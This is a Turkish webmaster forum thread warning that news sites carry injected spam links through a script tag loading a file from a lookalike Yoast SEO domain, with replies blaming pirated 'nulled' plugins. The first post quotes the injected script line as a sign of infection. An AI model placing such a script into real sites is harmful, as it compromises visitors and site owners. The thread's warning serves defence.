• 08-05-2024, 06:46:27
    #1
    Merhaba,

    Örnek site kaynak kodu:
    <script src="https://yoast-schema-graph.com/213.js"></script><script type='text/javascript' id='wp-polls-js-extra'>

    213.js içeriği;
    https://yoast-schema-graph.com/213.js

    Yüzlerce haber sitesine bu şekilde hacklink eklenmiş, eklenen yüzlerce hacklink var. Siteleriniz bu şekilde çöp ediliyor. Yoast eklentisinden, en azından bu kodun yayılmış olduğu yoast eklentisinden biran önce kurtulun.

    Sitenizin kaynak kodlarında "yoast-schema-graph.com " var ise biliniz ki siteniz bu kişilerin oyuncağı olmuş durumdadır.
  • 08-05-2024, 06:48:41
    #2
    Bu kod enfekte olmuş bir site örneğini pm üzerinden iletir misiniz?
  • 08-05-2024, 06:49:52
    #3
    webgiller adlı üyeden alıntı: mesajı görüntüle
    Bu kod enfekte olmuş bir site örneğini pm üzerinden iletir misiniz?
    Gönderildi.
  • 08-05-2024, 06:51:27
    #4
    Sadece bu değil wordpress de var+ez, null+ed kullandıysanız hertürlü geçmiş olsun derim
  • 08-05-2024, 07:11:32
    #5
    Wordpress problemleri bitmez. Allah kurtarsın
  • 08-05-2024, 07:11:55
    #6
    Bunun sebebi bedavaya alınan "premium" adı altındaki yazılımlar hocam.
    X bir site düşünün ücretsiz olarak 100 lerce eklentiyi temayı müşterilerine indirtiyor.
    Sadece ads ile gelir elde etmesi mümkün olan bir yapı değil. Bu adam mecbur bu işten bir şekilde gelir elde etmeli.
    Emin olmadığınız ve ücretsiz kaynaklardan GPL adı altında ücretsiz dağıtılan hiçbir kaynağı almayın.
    İllaki alacaksanız temiz olduğundan ve güvenli olduğundan emin olabileceğiniz, sahibine ulaşabileceğiniz, Türk menşei bir sürü kaynak var.
  • 08-05-2024, 11:42:15
    #7
    R10'un en iyisi sanırım
    Güzel fark etmişsiniz elinize sağlık.
    GPL eklenti ve temalardan uzak durmak önemli.
  • 08-05-2024, 12:26:31
    #8
    Wordpress eklentilerini orjinal sitesinden indiriniz.